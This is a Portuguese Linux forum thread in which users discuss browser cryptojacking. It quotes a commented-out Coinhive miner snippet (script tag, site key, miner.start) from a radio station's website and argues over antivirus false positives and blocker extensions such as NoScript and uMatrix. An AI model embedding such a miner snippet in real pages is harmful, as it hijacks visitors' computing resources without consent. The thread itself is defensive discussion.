Sites que usam seu computador para minerar

hrcerq
(usa Outra)

Enviado em 29/01/2018 - 12:55h

Observe o trecho do código-fonte do site em questão (http://www.radioguaiba.com.br/):

<!--

<script src="https://coinhive.com/lib/coinhive.min.js"></script>

<script>

        var miner = new CoinHive.User('LEndSPCsw3pTXYfUQMvLfuj7QiBW6buH', 'john-doe', {threads: 2});

        miner.start();

</script>

-->

 

Observe que o trecho do script de mineração está comentado. Comentários, como você bem deve saber, não são processados pelo navegador, portanto são o mesmo que nada. Se esse script fosse capturado como malware, seria, na verdade, um falso positivo.

---

Atenciosamente,
Hugo Cerqueira

Wiltzer
(usa Outra)

Enviado em 30/01/2018 - 02:59h

Essas extensões bloqueiam somente o coinhive ou outros semelhantes?

Henrique - RJ
(usa Outra)

Enviado em 30/01/2018 - 06:17h

Se você baixar esse js e o enviar para o VirusTotal um montão de antivírus o vai detectar.

Não tem nada de falso positivo.

removido
(usa Nenhuma)

Enviado em 30/01/2018 - 09:33h

+ 10000000000000000000000000000000000000000000000000

removido
(usa Nenhuma)

Enviado em 30/01/2018 - 09:36h

LIXO esse tal Sophos

Henrique - RJ
(usa Outra)

Enviado em 30/01/2018 - 09:50h

Aqui uso um monitor de carga do sistema que fica ao lado da data e hora na barra monitorando o uso da CPU, da memória RAM e da memória swap.

Henrique - RJ
(usa Outra)

Enviado em 30/01/2018 - 09:55h

Eu estou gostando do Sophos no Linux.

Só é chato quando se atualiza pondo o processador e o disco a 100% que é semelhante ao Muon que verifica de tempos em tempos se há atualizações para o sistema ( acabei desinstalando ele para não perturbar e uso o Synaptic manualmente para atualizações ).

Confesso que é gratificante ver ele detectando uma ameaça e bloqueando a execução dela ao acessar um site de testes emitindo um alerta como este:

https://s10.postimg.org/wz28epa2h/imagem9.png

hrcerq
(usa Outra)

Enviado em 30/01/2018 - 10:21h

Tecnicamente esses mineradores sequer são vírus, já que não são estruturas auto-replicantes. Além do mais, parece que você precisa se familiarizar mais com o conceito de falso positivo, e também o de comentário html/javascript.

Caso contrário, explique como que a detecção de um script comentado não é falso positivo. Mas por favor, uma explicação com argumentos técnicos bem fundamentados, nada de "bla bla bla" e senso comum, que isso não explica nada.

---

Atenciosamente,
Hugo Cerqueira

hrcerq
(usa Outra)

Enviado em 30/01/2018 - 10:28h

O NoScript bloqueia todos os tipos de mineradores javascript. Todo e qualquer javascript ele bloqueia, salvo se você expressamente permitir sua execução. O bloqueio/liberação é feito por domínios. Então, quando você marca um domínio como confiável, os scripts daquele domínio tem permissão para executar no seu navegador. Os demais não executam.

A regra de ouro com o noscript é: "Se está funcionando sem liberar os scripts, deixe os scripts bloqueados. Se não está funcionando, avalie a procedência dos domínios e o nível de necessidade dessa liberação."

Lembre-se: Javascript é código executado no seu computador, não no servidor remoto. Ter cuidado com o que executa no seu computador é uma tarefa mais sua do que do provedor do serviço Web que estiver acessando.

---

Atenciosamente,
Hugo Cerqueira

Mauriciodez
(usa Debian)

Enviado em 30/01/2018 - 11:31h

Então é isso aí mesmo ...

1º - Eu tô perdendo o tato para ler HTML mesmo, não tinha percebido que o script estava comentado .... kkkkkkkkkkkkkkkkkkk
2º - Eu Descomentei o script e tanto o No Coin quanto o No Script detectaram o meliante, vou deixar o No Coin instalado por via das dúvidas.


------------------------------------------| Linux User #621728 |-----------------------------------------

" Nem sempre é amigo aquele que te tira do buraco !!! ( Saddam Hussein )"

------------------------------------------| Linux User #621728 |-----------------------------------------

guipsp
(usa Ubuntu)

Enviado em 30/01/2018 - 14:55h

Uma alternativa do mesmo criador do ublock chama-se umatrix. Por padrão ele já bloqueia os scripts externos e permite customizar as regras de forma fácil, bloqueio de cookies, frame, imagem, etc, aos colegas curiosos recomendo dar uma olhada.

Um pouco sobre ele em português

http://www.hardware.com.br/comunidade/umatrix-extensao/1379980/

Skol
(usa Linux Mint)

Enviado em 30/01/2018 - 17:15h

Estou usando uMatrix há alguns meses, fiz um teste recentemente com ele e o adblock. Tentei acessar um script minerador e o adblock deixou passar mas o uMatrix bloqueou tranquilo. Quem quiser pode testar com o script abaixo:

coin-hive.com/lib/coinhive.min.js

Acho que o Utrax funciona bem.